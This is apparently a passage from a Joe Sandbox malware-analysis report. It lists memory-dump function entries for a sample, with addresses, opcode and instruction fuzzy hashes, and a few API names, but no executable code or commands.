Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e292593a2346657b6eb8abe66239b583ff76757889d8fcd74990d7a8c15a25e
Instruction ID: 4395e995b391db69d7ede3ea2806c1c8a524aa694faf870bf047e43fd4a1239a
Opcode Fuzzy Hash: 1e292593a2346657b6eb8abe66239b583ff76757889d8fcd74990d7a8c15a25e
Instruction Fuzzy Hash: 5531B276A05B4989EB20DF66E88029C37B4F74CB9CF455226EE8C13B29EF38C150C750

Function 00007FF72A028FF0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df755a7f9f181ff803823b2d0806d79bde9038356ed1f2b088f43f4907a99b08
Instruction ID: 04af31a6e26648de10482559a452ca421aeaf6338c3822928728a16e71c3d553
Opcode Fuzzy Hash: df755a7f9f181ff803823b2d0806d79bde9038356ed1f2b088f43f4907a99b08
Instruction Fuzzy Hash: 3631B27AA05B4989EB20DF66E88029D37B4F74DB98F455226EE8C13B29EF38C150C750

Function 00007FF72A06AA50 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827f951752bd89bf8ca92dbaf417bbd41c6cf184e8844eea6f662b50d9c3f8f2
Instruction ID: 631fd4666e7ba7c82d3dfd9dd2bbeb539a062e7cc83cc1212fcb91cf1fad5413
Opcode Fuzzy Hash: 827f951752bd89bf8ca92dbaf417bbd41c6cf184e8844eea6f662b50d9c3f8f2
Instruction Fuzzy Hash: 2B210C66F16B5588EF40EFA6EC814ED67B4F709BD8B845435EE4E13B19EE38C1808750

Function 00007FF72A06A4D0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f23c27e826dc16d363355ab053f223aa956836335dc77cce615b891eaa197be
Instruction ID: 77af556193a00c6b56033b636cbb5f34c5096480c9896e43c035a2631b8118bc
Opcode Fuzzy Hash: 6f23c27e826dc16d363355ab053f223aa956836335dc77cce615b891eaa197be
Instruction Fuzzy Hash: 7F212A66F16B1588EB40EFA2E8804ED67B4E709BD8B445435EE0E23B59EE38C1908750

Function 00007FF72A06BF80 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc105ae113dd9ebb499f686b240ce9824b11e2f882d402469c41a583a7d9a9c8
Instruction ID: 8b46a154fb366ca308b0d219d102bb2e755da800f609ab380a2d591ea2bfec59
Opcode Fuzzy Hash: bc105ae113dd9ebb499f686b240ce9824b11e2f882d402469c41a583a7d9a9c8
Instruction Fuzzy Hash: 39210C66F16B1588EF40EFA6EC814ED67B4F749BC8B445435EE4E13B59EE38C1908350

Function 00007FF72A06FF10 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05918fc1248b975d222956436176492df8597f2819da265dd20cf9e6c7264bd4
Instruction ID: 0b2db118171d0940001a427ee37e83ac43d625b972e09d9595f39732576d7117
Opcode Fuzzy Hash: 05918fc1248b975d222956436176492df8597f2819da265dd20cf9e6c7264bd4
Instruction Fuzzy Hash: 05212C66B16B1588EB40EFA6E8814ED67B4F749BD8B845435EE4E13B59EE38C1808350

Function 00007FF72A06B3B0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
Instruction ID: 66746a82398c98650d1206136a23cc0491b9d7f72855f8fb2c5fa1fc362bfc52
Opcode Fuzzy Hash: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
Instruction Fuzzy Hash: E8210966F16B5588EF40EFA6EC814EDA7B4F709BD8B445435EE0E13B19EE38C1908750

Function 00007FF72A06F150 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c49cc4cb5fd20c2c8b77cd12d1b038e3538d8f595d0dabc0cf13c35b97362ca
Instruction ID: 14f733c2d949bd392f037b04f6bdea9fd88cdf3547edccaaebade31e405e1573
Opcode Fuzzy Hash: 1c49cc4cb5fd20c2c8b77cd12d1b038e3538d8f595d0dabc0cf13c35b97362ca
Instruction Fuzzy Hash: DA212A66B16B5688EF40EFA2E8804ED67B4EB49BC8B445435EE0E13B59EE38C1908750

Function 00007FF72A06B1F0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
Instruction ID: 8fb2ab7986ea41f127be9cce419d1378ecc68a08caec17fad0657d064e1fdb53
Opcode Fuzzy Hash: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
Instruction Fuzzy Hash: 9E21FA66F16B5588EF40EFA6EC414EDA7B4E709BD8B445435EE0E13B19EE38C1908750

Function 00007FF72A06DB20 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db5646e96f1ff8c9395c0a62e54e5e86c7c898554bd0464582fce04f0f76811
Instruction ID: fa01a55a27a0bf4886c128498c74e977f0043578f996a5079998cb35e3cf09b0
Opcode Fuzzy Hash: 3db5646e96f1ff8c9395c0a62e54e5e86c7c898554bd0464582fce04f0f76811
Instruction Fuzzy Hash: 1E213C66B16B5688EF40EFA6EC804ED67B4F749BC8B445435EE4E13B19EE38C1818350

Function 00007FF72A06D220 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0712976e225e5b2f4763be9ef19959d40821d9cc80544662f083ba19d4e2989
Instruction ID: 7cbe846e5f74c00c638e0ec5756754b6e5c8774da5ce29b04384c7a9f2db034a
Opcode Fuzzy Hash: c0712976e225e5b2f4763be9ef19959d40821d9cc80544662f083ba19d4e2989
Instruction Fuzzy Hash: D621FA76F16B1588EF50EFA6E8414ED67B4EB09BC8B845535FE0E13B19EE38D1808350

Function 00007FF72A0512B1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 23499e2016412574379fd2e1b7d4f8318b64be535c81721d378c36e298e0409c
Instruction ID: 0180f4764b1bba35c79c84b0d082974de64fb01970aa0bc54b13b64a941af6e9
Opcode Fuzzy Hash: 23499e2016412574379fd2e1b7d4f8318b64be535c81721d378c36e298e0409c
Instruction Fuzzy Hash: 24213676A01B8584EB24AF26E8943AD7360FB48FD4F489422DF4D07315DF38D494C360

Function 00007FF72A042348 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 8ce3e757da67c655af5b8f6d8655d3e196656a833d96982b34aa08c9a1ab21a2
Instruction ID: 64842a39aee46a9c0ce4b4b7c0b3e3dfe361307a31c0ad9eec9c8931d73864bc
Opcode Fuzzy Hash: 8ce3e757da67c655af5b8f6d8655d3e196656a833d96982b34aa08c9a1ab21a2
Instruction Fuzzy Hash: B121A162B0864680EB24AF25E8443BDE361FF49F88F589071DF0D0B395DE3DE4868760

Function 00007FF72A0AD1A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f429d248f7e3d3087664ac9d900b69488d87f779774625c76a44f58e7d66e27b
Instruction ID: 9eb1e259247fa3802588a11d07593ad9a6025e43eca99754ce1ac243737a8323
Opcode Fuzzy Hash: f429d248f7e3d3087664ac9d900b69488d87f779774625c76a44f58e7d66e27b
Instruction Fuzzy Hash: E621A076A16B5989EB10DFA6E8800EC37B4FB49BCCB801126EE4E53B19EF38C150C750

Function 00007FF72A06844A Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 1724884cba89ca097dce37717a06f994ecdd22df31c92a7a14a54c841d5b1acb
Instruction ID: 362b54115aae370c26e73160ec958c24f641b37ccb1650bef00f4c6fb658a224
Opcode Fuzzy Hash: 1724884cba89ca097dce37717a06f994ecdd22df31c92a7a14a54c841d5b1acb
Instruction Fuzzy Hash: 39F0AF15E9D11305FEA8BF621D265BDC262EF46B84FC428B0D80E17783EC1DB2015A74

Function 00007FF72A0C6B00 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f75af1925c0ce7a60d5dd29e2b6d13451473ab83a1d6537ce2b3a364efd057dd
Instruction ID: 26b41ba98a219e8b67a7463d3dc80a543841045b53f91e081ebff5122c2d2dd6
Opcode Fuzzy Hash: f75af1925c0ce7a60d5dd29e2b6d13451473ab83a1d6537ce2b3a364efd057dd
Instruction Fuzzy Hash: E0115B21B1864395FB74BF12AD501B9E376FF59B80FC410B2D94E077A2EE2CE6058B64

Function 00007FF72A08C410 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8e364cc8adddad7bd3164d0080b3fb32528a4c20ea47283582ac767ae30f0c
Instruction ID: aa3c1130be730d7c8114877f11ff9e6c56fa8676f8ea95898941c5a860ae1feb
Opcode Fuzzy Hash: 8c8e364cc8adddad7bd3164d0080b3fb32528a4c20ea47283582ac767ae30f0c
Instruction Fuzzy Hash: 3C115076F01F158DEB00DFA5E8810AD77B8F709B98B601929DE5D63B19EF34C1618394

Function 00007FF72A08D970 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6755e1622f3d3c4fa8f21a4e0fe1c3ea9f388b16dd995effa5171ebaab262e8f
